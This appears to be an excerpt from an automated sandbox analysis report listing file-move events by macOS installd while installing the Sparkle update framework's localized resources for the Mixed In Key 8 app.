              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_UNIwZg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_q87fVS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_SS6HOR -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_nYQEd1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_yLx5tV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_hbpwJT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_IdHd0v -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_w8RA2Q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_OZxUj9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_HEODBC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_KdALRr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_G2sHGu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_Piu3zU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_KDNN35 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_mtedky -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_w6B9xG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_3sFG1k -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_9fzzoZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_wQ0hwz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_u4FQpE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_2XM2fW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUPasswordPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_WVPN3k -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_FM0SJf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_YEERAI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_ObEqX8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_98r7TK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUPasswordPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_vDNjsO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_FdtPvU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_iikYkq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_zDEa78 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_5yk3ZM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_uISpwp -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_91jNN3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_xTN7cM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_KRbX7w -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_aKcltM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdateAlert.nibJump to behavior
